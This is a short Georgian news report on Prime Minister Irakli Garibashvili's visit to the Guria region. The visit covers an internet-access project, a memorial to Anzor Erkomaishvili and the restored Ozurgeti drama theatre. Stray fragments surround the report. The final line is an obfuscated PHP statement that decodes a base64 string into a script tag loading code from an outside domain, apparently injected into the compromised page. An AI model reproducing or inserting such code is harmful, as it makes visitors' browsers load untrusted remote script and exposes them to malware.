celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი დღეს გურიის რეგიონს ეწვევა. როგორც მთავრობის ადმინისტრაციის მიერ გავრცელებულ ინფორმაციაშია აღნიშნული, მთავრობის მეთაური, 13:30 საათზე, სოფელ ზედა ბახვის საჯარო სკოლაში, ეკონომიკისა და მდგრადი განვითარების მინისტრ ნათია თურნავასა და მსოფლიო ბანკის რეგიონულ დირექტორ სებასტიან მოლინეუსთან ერთად, ინტერნეტიზაციის პროექტის პრეზენტაციას გახსნის.
 
როგორც ცნობილია, საქართველოს მთავრობის გადაწყვეტილებით, ფოლკლორის სახელმწიფო ცენტრს ანზორ ერქომაიშვილის სახელის მიენიჭა. ოზურგეთის ფოლკლორის ცენტრში ანზორ ერქომაიშვილის მემორიალი გაიხსნება. მემორიალურ დაფას, პრემიერ-მინისტრი ირაკლი ღარიბაშვილი ანზორ ერქომაიშვილის მეუღლესთან, ლალი სეთურიძესთან ერთად გახსნის.
 
გარდა ამისა, მთავრობის მეთაური, პარლამენტის თავმჯდომარე კახა კუჭავასა და კულტურის, სპორტისა და ახალგაზრდობის მინისტრ თეა წულუკიანთან ერთად, ოზურგეთის ალექსანდრე წუწუნავას სახელობის სახელმწიფო დრამატულ თეატრს დაათვალიერებს, რომელსაც, ფონდ „ქართუს" დაფინანსებით, სრული რეაბილიტაცია ჩაუტარდა.
 
აღსანიშნავია, რომ სარეაბილიტაციო სამუშაოების ღირებულებამ 20 მილიონი ლარი შეადგინა. ხელისუფლების წარმომადგენლები ასევე დაესწრებიან ნოდარ დუმბაძის ნაწარმოებების მიხედვით დადგმულ წარმოდგენას.
1168
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");